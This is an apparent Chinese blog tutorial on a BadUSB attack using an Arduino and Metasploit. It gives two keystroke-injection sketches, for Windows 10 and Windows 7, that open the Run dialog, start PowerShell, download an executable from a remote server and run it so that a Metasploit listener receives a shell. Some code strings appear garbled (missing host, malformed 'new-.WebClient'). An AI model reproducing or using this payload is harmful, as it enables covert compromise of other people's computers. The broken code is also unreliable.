badusb攻击(msfconsole)
准备
badusb
Arduino
下载软件
点击下载
运行软件
在工具菜单中 选择,选择badusb的端口和开发版。
注入代码
windows10系统
voidsetup(){ Keyboard.begin();//开始键盘通讯 delay(1000);//延时 Keyboard.press(KEY_LEFT_GUI);//win键 delay(500); Keyboard.press('r');//r键 delay(500); Keyboard.release(KEY_LEFT_GUI); Keyboard.release('r'); Keyboard.press(KEY_CAPS_LOCK); Keyboard.release(KEY_CAPS_LOCK); delay(500); Keyboard.println("powershell-Command$clnt=new-.WebClient;$url='/8888.exe';$file='%HOMEPATH%\\windows.exe';$clnt.DownloadFile($url,$file);%HOMEPATH%\\windows.exe;"); Keyboard.press(KEY_RETURN); Keyboard.release(KEY_RETURN); Keyboard.press(KEY_CAPS_LOCK); Keyboard.release(KEY_CAPS_LOCK); } voidloop()//循环{ }#include
windows7系统
voidsetup(){//初始化 Keyboard.begin();//开始键盘通讯 delay(5000);//延时 Keyboard.press(KEY_LEFT_GUI);//win键 delay(500); Keyboard.press('r');//r键 delay(500); Keyboard.release(KEY_LEFT_GUI); Keyboard.release('r'); delay(500); Keyboard.press(KEY_CAPS_LOCK); Keyboard.release(KEY_CAPS_LOCK); Keyboard.println("CMD.EXE/t:01/kMODEcon:cols=16lines=2"); delay(1000); Keyboard.println("POWERSHELL-cOMMAND$CLNT=NEW-.wEBcLIENT;$URL='/8888.exe';$FILE='c:\\X.EXE';$CLNT.dOWNLOADfILE($URL,$FILE);"); delay(3000); Keyboard.println("C:\\X.EXE&EXIT"); Keyboard.press(KEY_CAPS_LOCK); Keyboard.release(KEY_CAPS_LOCK); Keyboard.end();//结束键盘通讯 } voidloop()//循环{ }#include
编译上传
成功如下:
配置监听
在msf中我们配置参数,插入badusb即可得到shell,需要注意的是,本代码仅支持win10对于win7和xp由于不能直接用powershell下载,所以以上代码不能实现。
其他代码
特别鸣谢以下代码由嘉木相思提供,在此特别感谢默默为网络安全奉献的小伙伴们。
下载地址:
点击阅读原文访问下载链接
如果觉得《badusb代码_badusb攻击代码》对你有帮助,请点赞、收藏,并留下你的观点哦!
